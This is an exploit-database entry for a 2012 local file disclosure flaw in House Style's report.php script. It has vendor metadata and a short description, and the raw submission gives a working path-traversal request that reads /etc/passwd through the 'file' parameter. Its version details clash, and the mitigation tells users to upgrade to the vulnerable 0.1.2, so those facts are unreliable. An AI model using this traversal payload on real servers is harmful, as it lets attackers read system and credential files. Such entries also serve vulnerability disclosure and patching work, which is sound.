header-logo
Suggest Exploit
vendor:
House Style
by:
GoLd_M
7,5
CVSS
HIGH
Local File Disclosure Vulnerability
22
CWE
Product Name: House Style
Affected Version From: 0.1.2
Affected Version To: 1.03
Patch Exists: Yes
Related CWE: N/A
CPE: a:housestyle:house_style
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2012

House Style 0.1.2 => readfile() Local File Disclosure Vulnerability

House Style 0.1.2 is vulnerable to a local file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to read any file on the server, including sensitive files such as /etc/passwd. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'file' parameter in the 'report.php' script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of House Style 0.1.2.
Source

Exploit-DB raw data:

# Exploit Title: House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/housestyle/
# Version: 1.03
# Category:: readfile() Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[House Style 0.1.2]/report.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/aqz25984.jpg

Navigation

Suggest Exploit

Services By CQR